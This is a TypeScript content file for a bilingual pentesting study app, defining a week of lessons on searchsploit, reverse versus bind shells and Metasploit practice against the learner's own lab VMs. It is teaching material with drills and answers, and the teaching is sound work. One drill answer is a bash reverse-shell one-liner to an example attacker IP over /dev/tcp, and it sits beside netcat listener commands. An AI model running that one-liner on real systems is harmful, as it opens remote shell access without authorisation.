import { StudyWeek } from "@/lib/types";
import {
  REVERSE_BIND_WORKSHOP,
  SEARCHSPLOIT_WORKSHOP,
  WEEK4_FLOW_WORKSHOP,
  WEEK4_TROUBLESHOOTING,
} from "@/content/workshops/week4-assessment";

/**
 * MES 1 / SEMANA 4 — searchsploit como índice + reverse/bind + unir el flujo.
 * Sin recetas nuevas de exploit. LHOST = vboxnet0. Solo VMs propias.
 */
export const month1Week4: StudyWeek = {
  id: "m1-w4",
  monthId: "m1",
  title: "Semana 4 — Vulnerability Assessment y Explotación",
  goal: "Proceso: versión de Nmap → searchsploit (índice) → reverse vs bind (flecha TCP, LHOST). Unir Semanas 1–3 en TU lab, no un catálogo de PoCs.",
  detailed: true,
  blocks: [
    {
      id: "m1-w4-b1",
      weekId: "m1-w4",
      order: 1,
      title: "Vulnerability Assessment: searchsploit (índice)",
      titleEn: "Vulnerability assessment: searchsploit (index)",
      objective: "De TU -sV: searchsploit nombre+versión. Anota hit. No copies/ejecutes el PoC. OpenVAS es optional.",
      objectiveEn: "From YOUR -sV: searchsploit name+version. Note the hit. Do not copy/run a PoC. OpenVAS is optional.",
      durationMin: 45,
      type: "practice",
      theoryEs:
        "Vulnerability Assessment = PROCESO. Nmap versión → índice Exploit-DB (searchsploit). No memorizas CVEs. -m existe; hoy no es el hábito. Explotar = msf en TU MS2 (Semana 3).",
      theoryEn:
        "searchsploit is an offline index. Match YOUR nmap VERSION. Do not run the mirrored file today.",
      examPhrases: ["searchsploit", "CVE", "Exploit-DB", "vulnerability assessment"],
      practiceSteps: [
        "Abre tu scan MS2 (ms2_full.nmap o nmap -sV -p21,445 <TARGET_MS2>). Copia UN producto+versión (ej. vsftpd 2.3.4).",
        "searchsploit vsftpd 2.3.4  (o la versión que tengas). Anota 1 hit. ¿Linux? ¿coincide?",
        "searchsploit apache 2.4.49  — drill de examen; MS2 puede NO tenerlo. Di por qué no aplica.",
        "searchsploit -u solo si la base está vieja (red). No es el objetivo del bloque.",
        "STOP. No searchsploit -m + python/gcc. Recall.",
      ],
      workshop: SEARCHSPLOIT_WORKSHOP,
      troubleshooting: WEEK4_TROUBLESHOOTING.filter((t) => ["ss-run", "ss-wrong-os"].includes(t.id)),
      subtopics: ["vuln-assessment"],
      drills: [
        {
          id: "d1",
          promptEs: "Busca exploits de Apache 2.4.49 con searchsploit.",
          promptEn: "Search exploits for Apache 2.4.49 with searchsploit.",
          answer: "searchsploit apache 2.4.49",
          subtopicId: "vuln-assessment",
          explanation: "nombre + versión. No lanza el exploit.",
          howToEs: "searchsploit apache 2.4.49",
          conceptQuestion: "¿searchsploit explota el host?",
          conceptAnswer: "no",
        },
        {
          id: "d2",
          promptEs: "Flag de searchsploit para copiar (mirror) un exploit al directorio actual (sintaxis; no lo ejecutes hoy).",
          promptEn: "searchsploit flag to mirror an exploit into the current directory (syntax; do not run it today).",
          answer: "searchsploit -m",
          answerKeywords: ["-m"],
          subtopicId: "vuln-assessment",
          explanation: "-m copia un archivo. Hoy el hábito es buscar y parar, no gcc.",
          howToEs: "searchsploit -m (el path es el del hit).",
        },
        {
          id: "d3",
          promptEs: "Actualizar la base local de searchsploit.",
          promptEn: "Update the local searchsploit database.",
          answer: "searchsploit -u",
          subtopicId: "vuln-assessment",
          explanation: "-u actualiza. Opcional si ya está al día.",
          howToEs: "searchsploit -u",
        },
      ],
      comparisonTable: {
        caption: "Índice vs explotación",
        headers: ["Herramienta", "Hace", "No hace hoy"],
        rows: [
          ["searchsploit", "lista hits por versión", "explotar MS2"],
          ["msf search/use", "módulo en TU lab", "adivinar sin -sV"],
          ["OpenVAS/Nessus", "OPTIONAL CVEs", "sustituir este bloque"],
        ],
      },
      glossary: [
        { en: "CVE", es: "identificador público de vulnerabilidad" },
        { en: "Exploit-DB", es: "base de exploits; searchsploit es la copia local" },
        { en: "vulnerability scanner", es: "escáner de CVEs (Nessus/OpenVAS, optional)" },
      ],
      resources: [
        { label: "TryHackMe — Vulnerabilities 101", url: "https://tryhackme.com/room/vulnerabilities101", platform: "TryHackMe" },
      ],
      closingChecklist: [
        "searchsploit <servicio> <versión> de memoria",
        "Anoté un hit de MI scan y no ejecuté el PoC",
      ],
    },
    {
      id: "m1-w4-b2",
      weekId: "m1-w4",
      order: 2,
      title: "Reverse shell vs Bind shell + Netcat",
      titleEn: "Reverse vs bind + Netcat",
      objective: "Dibujar quién inicia TCP. Reverse → tú escuchas (LHOST vboxnet0). Bind → tú te conectas a RHOSTS. nc -lvnp de memoria.",
      objectiveEn: "Draw who starts TCP. Reverse → you listen (LHOST vboxnet0). Bind → you connect to RHOSTS. nc -lvnp from memory.",
      durationMin: 45,
      type: "practice",
      theoryEs:
        "Reverse: la víctima llama a Kali (vboxnet0:LPORT). Bind: Kali llama al guest. El 90% del examen es reverse. nc -lvnp = listener. El one-liner bash es sintaxis de examen, no un payload para internet.",
      theoryEn:
        "Reverse: victim connects to you. Bind: you connect to victim. Listener: nc -lvnp. LHOST = vboxnet0 for MS2.",
      examPhrases: ["reverse shell", "bind shell", "listener", "netcat"],
      practiceSteps: [
        "En papel: flecha reverse vs bind. Escribe LHOST = inet vboxnet0, no wlan0.",
        "En Kali: nc -lvnp 4444  — Ctrl+C cuando veas listening. Eso es el atacante en reverse.",
        "Di en voz alta el one-liner del drill (10.8.0.15 = IP de ejemplo VPN). En TU lab esa IP sería vboxnet0.",
        "Bind: comando cliente nc <RHOST> <puerto>. No hace falta -e (OpenBSD nc a menudo no lo tiene).",
        "Recall. No lances shells a tu router ni a 192.168.1.0/24.",
      ],
      workshop: REVERSE_BIND_WORKSHOP,
      troubleshooting: WEEK4_TROUBLESHOOTING.filter((t) => ["rev-lhost", "bind-rev-mix"].includes(t.id)),
      subtopics: ["reverse-vs-bind"],
      drills: [
        {
          id: "d1",
          promptEs: "Netcat: listener en tu máquina, puerto 4444 (reverse).",
          promptEn: "Netcat listener on your machine, port 4444 (reverse).",
          answer: "nc -lvnp 4444",
          subtopicId: "reverse-vs-bind",
          explanation: "Tú escuchas. La víctima llamaría aquí. LHOST en msf es esta idea.",
          howToEs: "nc -lvnp 4444",
          conceptQuestion: "En reverse, ¿quién inicia la conexión?",
          conceptAnswer: "victima",
        },
        {
          id: "d2",
          promptEs: "One-liner bash reverse hacia 10.8.0.15:4444 (sintaxis de examen; en lab sería vboxnet0).",
          promptEn: "Bash reverse one-liner to 10.8.0.15:4444 (exam syntax; in lab it would be vboxnet0).",
          answer: "bash -i >& /dev/tcp/10.8.0.15/4444 0>&1",
          subtopicId: "reverse-vs-bind",
          explanation: "La víctima ejecuta esto. 10.8.0.15 es LHOST de ejemplo (VPN). No es la IP del guest.",
          howToEs: "bash -i, /dev/tcp/IP/4444. IP = atacante.",
        },
        {
          id: "d3",
          promptEs: "Netcat cliente (bind): conéctate a 10.10.10.220 puerto 5555.",
          promptEn: "Netcat client (bind): connect to 10.10.10.220 port 5555.",
          answer: "nc 10.10.10.220 5555",
          subtopicId: "reverse-vs-bind",
          explanation: "Tú inicias hacia quien ya escucha. No es -lvnp.",
          howToEs: "nc IP puerto, sin -l.",
        },
      ],
      comparisonTable: {
        caption: "Reverse vs bind",
        headers: ["Tipo", "Quién inicia", "Tú en Kali", "LHOST"],
        rows: [
          ["Reverse", "víctima → tú", "nc -lvnp / handler", "sí: vboxnet0"],
          ["Bind", "tú → víctima", "nc RHOST puerto", "a menudo no"],
        ],
      },
      glossary: [
        { en: "listener", es: "proceso que espera TCP (Kali en reverse)" },
        { en: "one-liner", es: "comando de examen; no un kit de internet" },
        { en: "NAT / firewall", es: "por eso reverse es el caso típico" },
      ],
      resources: [
        { label: "TryHackMe — Intro to Shells", url: "https://tryhackme.com/room/introtoshells", platform: "TryHackMe" },
      ],
      closingChecklist: [
        "Explico reverse vs bind con la flecha, sin dudar",
        "nc -lvnp de memoria; LHOST = vboxnet0 en este lab",
        "No lancé one-liners fuera de TU lab",
      ],
    },
    {
      id: "m1-w4-b3",
      weekId: "m1-w4",
      order: 3,
      title: "Flujo Linux end-to-end (sin walkthrough)",
      titleEn: "Linux end-to-end flow (no walkthrough)",
      objective: "En Kioptrix o MS2: nmap → enum → índice/msf (flujo Semana 3) → whoami. Documenta. Sin guía nueva.",
      objectiveEn: "On Kioptrix or MS2: nmap → enum → index/msf (week 3 flow) → whoami. Write it down. No new walkthrough.",
      durationMin: 50,
      type: "practice",
      theoryEs:
        "Sin teoría nueva. El exploit 'correcto' es el que sale de TU -sV, no de un write-up. Solo VMs propias Host-Only.",
      theoryEn:
        "Reuse weeks 1–3. Target = your guest only. hashdump SAM does not apply on Linux.",
      examPhrases: ["full port scan", "service version", "get a shell"],
      practiceSteps: [
        "nmap -p- -sV -sC <IP> -oA week4_box  (Kali host, /24 de vboxnet0).",
        "Enum del puerto más jugoso (Semana 2): no mezcles Gobuster y SMB.",
        "searchsploit o msf search de ESA versión. show options. RHOSTS=guest. Reverse → LHOST vboxnet0.",
        "Si hay sesión (la de Semana 3 cuenta): whoami / id. Documenta el orden en notas.",
        "No abras un .c de searchsploit. No EternalBlue contra Windows ajeno.",
      ],
      workshop: WEEK4_FLOW_WORKSHOP,
      troubleshooting: WEEK4_TROUBLESHOOTING.filter((t) => ["ss-run", "rev-lhost"].includes(t.id)),
      subtopics: ["exploit-linux"],
      resources: [
        { label: "Kioptrix Level 1 (VM propia, Host-Only)", url: "https://www.vulnhub.com/entry/kioptrix-level-1-1,22/", platform: "VulnHub" },
        { label: "Metasploitable 2 — guía de servicios (contexto)", url: "https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/", platform: "Docs" },
      ],
      closingChecklist: [
        "Documenté recon → enum → (msf/índice) → whoami en una VM mía",
        "LHOST no fue wlan0 si usé reverse",
      ],
    },
    {
      id: "m1-w4-b4",
      weekId: "m1-w4",
      order: 4,
      title: "Segundo vector en MS2 (mismo flujo)",
      titleEn: "Second MS2 vector (same flow)",
      objective: "Otro puerto de TU nmap MS2. search/use/show options/set RHOSTS. whoami. Linux: no hashdump SAM. No Windows pirata.",
      objectiveEn: "Another port from YOUR MS2 nmap. search/use/show options/set RHOSTS. whoami. Linux: no SAM hashdump. No pirated Windows.",
      durationMin: 50,
      type: "practice",
      theoryEs:
        "Mismo flujo Metasploit. Elige un servicio que YA salió en el scan (no un CVE de blog). EternalBlue = solo si más adelante tienes una VM Windows legal.",
      theoryEn:
        "Same msf flow on a service from YOUR scan. MS2 is Linux.",
      examPhrases: ["show options", "RHOSTS", "second attack path"],
      practiceSteps: [
        "Del scan: un puerto distinto a vsftpd si ya lo usaste (p. ej. 445 o 6667 SI están open en TU -sV).",
        "msfconsole: search <eso>. use ruta. show options. set RHOSTS <TARGET_MS2>. Reverse → LHOST vboxnet0.",
        "exploit solo contra ese guest. whoami. Documenta. No -m + gcc.",
        "hashdump: N/A Linux.",
      ],
      workshop: WEEK4_FLOW_WORKSHOP,
      troubleshooting: WEEK4_TROUBLESHOOTING.filter((t) => ["rev-lhost", "bind-rev-mix"].includes(t.id)),
      subtopics: ["exploit-windows", "exploit-linux"],
      resources: [
        { label: "Rapid7 — Metasploitable 2 (lista de servicios, no walkthrough)", url: "https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/", platform: "Docs" },
      ],
      closingChecklist: [
        "Segundo servicio de MI scan, mismo flujo de consola",
        "whoami / sysinfo; no SAM en Linux",
      ],
    },
    {
      id: "m1-w4-b5",
      weekId: "m1-w4",
      order: 5,
      title: "Drill combinado final de Mes 1",
      titleEn: "Month 1 combined drill",
      objective: "De memoria, <20 min: comandos clave Mes 1 (Nmap, enum, msf, searchsploit, nc listener).",
      objectiveEn: "From memory, <20 min: Month 1 key commands (Nmap, enum, msf, searchsploit, nc listener).",
      durationMin: 45,
      type: "drill",
      theoryEs: "Sin teoría nueva. Fijación. Cualquier fallo → 3 repeticiones de ESE comando.",
      practiceSteps: [
        "Sin apuntes: Nmap -sn / -p- -sV, enum4linux -a, gobuster dir, hydra -l -P corta, search, show options, set LHOST vboxnet0, searchsploit, nc -lvnp.",
        "Verifica contra Semanas 1–4.",
        "El que falles, tres veces más.",
      ],
      subtopics: [
        "nmap-basic", "nmap-scripts", "enum4linux", "gobuster-dir", "hydra-bruteforce",
        "tool-selection", "msf-search-use", "msf-options", "msf-lhost-lport",
        "msf-sysinfo", "msf-hashdump", "msf-multihandler", "vuln-assessment", "reverse-vs-bind",
      ],
      closingChecklist: [
        "12 de 15 en el primer intento (80%)",
        "Repetí 3 veces lo fallado",
      ],
    },
    {
      id: "m1-w4-b6",
      weekId: "m1-w4",
      order: 6,
      title: "Skill-check final de Mes 1 + cierre",
      titleEn: "Month 1 final skill-check",
      objective: "Skill-check integrador ≥70%. Si no, remediación (no Mes 2).",
      objectiveEn: "Integrator skill-check ≥70%. If not, remediation (do not start Month 2).",
      durationMin: 45,
      type: "checkpoint",
      theoryEs:
        "Punto de control. <70% → ciclo de repaso del subtema exacto. No avances.",
      practiceSteps: [
        "Simulacros > Skill-checks > Mes 1 Final (o Semana 4 según la app).",
        "Si repruebas: subtema exacto → remediación.",
        "Si apruebas: checklist de cierre.",
      ],
      subtopics: [
        "nmap-basic", "nmap-scripts", "passive-recon", "enum4linux", "smb-manual",
        "gobuster-dir", "hydra-bruteforce", "tool-selection", "ftp-ssh-enum",
        "msf-search-use", "msf-options", "msf-lhost-lport", "msf-sysinfo",
        "msf-hashdump", "msf-multihandler", "msfvenom", "vuln-assessment",
        "exploit-linux", "exploit-windows", "reverse-vs-bind",
      ],
      closingChecklist: [
        "Skill-check Mes 1 ≥ 70%",
        "Huecos Metasploit y Gobuster/Hydra/enum4linux cerrados en práctica",
        "Al menos un flujo documentado en MS2/Kioptrix propias",
        "Horas del mes en Progreso",
      ],
    },
  ],
};
